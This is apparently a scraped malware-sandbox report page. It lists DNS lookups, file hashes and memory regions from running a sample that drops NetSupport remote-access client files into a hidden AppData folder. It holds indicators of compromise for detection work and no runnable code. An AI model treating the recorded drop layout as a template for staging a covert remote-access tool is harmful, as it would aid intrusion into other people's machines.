    r11.o.lencr.org
    dns
    wscript.exe
    61 B
    160 B
    1
    1

    DNS Request

    r11.o.lencr.org

    DNS Response

    2.18.190.73
    2.18.190.80

  • 8.8.8.8:53
    97.17.167.52.in-addr.arpa
    dns
    71 B
    145 B
    1
    1

    DNS Request

    97.17.167.52.in-addr.arpa

  • 8.8.8.8:53
    61.45.26.184.in-addr.arpa
    dns
    71 B
    135 B
    1
    1

    DNS Request

    61.45.26.184.in-addr.arpa

  • 8.8.8.8:53
    186.162.141.79.in-addr.arpa
    dns
    73 B
    138 B
    1
    1

    DNS Request

    186.162.141.79.in-addr.arpa

  • 8.8.8.8:53
    73.190.18.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    73.190.18.2.in-addr.arpa

  • 8.8.8.8:53
    10.27.171.150.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    10.27.171.150.in-addr.arpa

  • 8.8.8.8:53
    0.159.190.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    0.159.190.20.in-addr.arpa

  • 8.8.8.8:53
    88.156.103.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    88.156.103.20.in-addr.arpa

  • 8.8.8.8:53
    geo.netsupportsoftware.com
    dns
    client32.exe
    72 B
    120 B
    1
    1

    DNS Request

    geo.netsupportsoftware.com

    DNS Response

    172.67.68.212
    104.26.0.231
    104.26.1.231

  • 8.8.8.8:53
    143.159.181.5.in-addr.arpa
    dns
    72 B
    113 B
    1
    1

    DNS Request

    143.159.181.5.in-addr.arpa

  • 8.8.8.8:53
    212.68.67.172.in-addr.arpa
    dns
    72 B
    134 B
    1
    1

    DNS Request

    212.68.67.172.in-addr.arpa

  • 8.8.8.8:53
    217.106.137.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    217.106.137.52.in-addr.arpa

  • 8.8.8.8:53
    212.20.149.52.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    212.20.149.52.in-addr.arpa

  • 8.8.8.8:53
    15.164.165.52.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    15.164.165.52.in-addr.arpa

  • 8.8.8.8:53
    79.190.18.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    79.190.18.2.in-addr.arpa

  • 8.8.8.8:53
    14.227.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    14.227.111.52.in-addr.arpa

  • 8.8.8.8:53
    tse1.mm.bing.net
    dns
    62 B
    170 B
    1
    1

    DNS Request

    tse1.mm.bing.net

    DNS Response

    150.171.27.10
    150.171.28.10

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lr1ob443.xj4.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\HTCTL32.DLL

    Filesize

    320KB

    MD5

    c94005d2dcd2a54e40510344e0bb9435

    SHA1

    55b4a1620c5d0113811242c20bd9870a1e31d542

    SHA256

    3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899

    SHA512

    2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a

  • C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\MSVCR100.dll

    Filesize

    755KB

    MD5

    0e37fbfa79d349d672456923ec5fbbe3

    SHA1

    4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

    SHA256

    8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

    SHA512

    2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

  • C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\NSM.LIC

    Filesize

    195B

    MD5

    e9609072de9c29dc1963be208948ba44

    SHA1

    03bbe27d0d1ba651ff43363587d3d6d2e170060f

    SHA256

    dc6a52ad6d637eb407cc060e98dfeedcca1167e7f62688fb1c18580dd1d05747

    SHA512

    f0e26aa63b0c7f1b31074b9d6eef88d0cfbc467f86b12205cb539a45b0352e77ce2f99f29baeab58960a197714e72289744143ba17975699d058fe75d978dfd0

  • C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\PCICHEK.DLL

    Filesize

    18KB

    MD5

    104b30fef04433a2d2fd1d5f99f179fe

    SHA1

    ecb08e224a2f2772d1e53675bedc4b2c50485a41

    SHA256

    956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd

    SHA512

    5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

  • C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\PCICL32.dll

    Filesize

    3.6MB

    MD5

    d3d39180e85700f72aaae25e40c125ff

    SHA1

    f3404ef6322f5c6e7862b507d05b8f4b7f1c7d15

    SHA256

    38684adb2183bf320eb308a96cdbde8d1d56740166c3e2596161f42a40fa32d5

    SHA512

    471ac150e93a182d135e5483d6b1492f08a49f5ccab420732b87210f2188be1577ceaaee4ce162a7acceff5c17cdd08dc51b1904228275f6bbde18022ec79d2f

  • C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\client32.exe

    Filesize

    101KB

    MD5

    c4f1b50e3111d29774f7525039ff7086

    SHA1

    57539c95cba0986ec8df0fcdea433e7c71b724c6

    SHA256

    18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d

    SHA512

    005db65cedaaccc85525fb3cdab090054bb0bb9cc8c37f8210ec060f490c64945a682b5dd5d00a68ac2b8c58894b6e7d938acaa1130c1cc5667e206d38b942c5

  • C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\client32.ini

    Filesize

    669B

    MD5

    f734588a7620c48021688d3c2940353a

    SHA1

    c9b9aece48b4c134b838217426145fdd542f60e6

    SHA256

    97a2ce9683de5c9e03331d22309b5348f45cf65e77b1f011ba3505e2deafafc6

    SHA512

    0549dcc50347802c774078f6f9ecfec2b21b0c489aa8e96168ea12a2cec55169d4172baac13819a07686755697794f05ac5b75d554229faf268f9e64f54e2033

  • C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\pcicapi.dll

    Filesize

    32KB

    MD5

    34dfb87e4200d852d1fb45dc48f93cfc

    SHA1

    35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641

    SHA256

    2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703

    SHA512

    f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

  • memory/5024-21-0x0000012A21110000-0x0000012A21122000-memory.dmp

    Filesize

    72KB

  • memory/5024-20-0x0000012A210E0000-0x0000012A210EA000-memory.dmp

    Filesize

    40KB

  • memory/5024-18-0x00007FFCD7C90000-0x00007FFCD8751000-memory.dmp

    Filesize

    10.8MB

  • memory/5024-6-0x00007FFCD7C93000-0x00007FFCD7C95000-memory.dmp

    Filesize

    8KB

  • memory/5024-17-0x00007FFCD7C90000-0x00007FFCD8751000-memory.dmp

    Filesize

    10.8MB

  • memory/5024-10-0x0000012A08F00000-0x0000012A08F22000-memory.dmp

    Filesize

    136KB

  • memory/5024-86-0x00007FFCD7C90000-0x00007FFCD8751000-memory.dmp

    Filesize

    10.8MB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.